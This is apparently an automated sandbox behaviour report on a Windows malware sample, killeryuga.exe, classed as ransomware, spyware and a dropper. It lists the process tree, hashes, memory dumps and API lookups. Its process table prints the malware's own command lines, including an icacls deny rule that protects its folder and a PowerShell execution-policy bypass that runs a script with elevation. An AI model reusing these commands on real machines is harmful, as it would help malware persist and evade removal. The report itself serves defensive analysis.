ac69e0f6...26b4 | Sequential Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Spyware, Ransomware, Trojan, Dropper, Backdoor

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e0 Analysis Target High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" -
#3 0x98c Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x99c Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x9d0 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask #5
#7 0x9d8 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #5
#8 0x9ec Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" #5
#9 0x9fc Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe" #5
#10 0xa0c Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin #8
#11 0xa18 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe" #5
#12 0xa38 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe" #5
#13 0xa4c Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #10
#14 0xb04 Child Process High (Elevated) powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}" #10
#16 0x780 Autostart Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart -
#18 0x588 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask #16
#19 0x5a4 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #16
#20 0x7a0 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #18

Behavior Information - Sequential View

Process #1: killeryuga.exe
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:22, Reason: Analysis Target
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:32
OS Process Information
Information Value
PID 0x8e0
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x8E4, 0x8F0, 0x8F4, 0x8F8, 0x8FC, 0x900, 0x904, 0x910, 0x984, 0x988, 0x998
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00293F80 0x002D2EB3 Marked Executable - 32-bit - False
buffer 0x00293F80 0x002D2EB3 Content Changed - 32-bit 0x002948AB, 0x00293F80 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe 345.50 KB
MD5: 55b42589931331c2929847c78d0933d5
SHA1: 904940b9ab5442595f75f6d6dfe46832569bc234
SHA256: ac69e0f6c8a697982a4897607ccd4def633354f6336a68985d48ae78920e26b4
SSDeep: 6144:CcygBt56u4UqjIC6ibJd9mke7R68W55C0aPCUN8VOuMua6oIHCKvFXT:3ygP5bq0C3JKJR68m5C76suMKoIH9XT
YARA Match: False
Modified Files
Filename File Size Hash Values YARA Match
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB
MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8
YARA Match: False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB
MD5: 74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5
SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9
SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9
YARA Match: False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB
MD5: 5e31bed3dcccef21e35fb4760123ec80
SHA1: 9b71b827ebf51079bc9fc5a16f8e55632420973f
SHA256: 2b20e239286f1c2d4e92d6657cc4476dc410b74553fb57b53f11b5fbd7101466
SSDeep: 192:JBdGeOS2B5KSijSgSaSQSzSASxSXSUS8SRSnSfSfSVSZSKSjwSWASMSYSVSvSvSJ:rdGj5it8TTZ4R5/4
YARA Match: False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB
MD5: 6852149628dae385c68c7a9db7028560
SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb
SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4
SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG
YARA Match: False
Threads
Thread 0x8e4
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x75b14124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x75b1439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
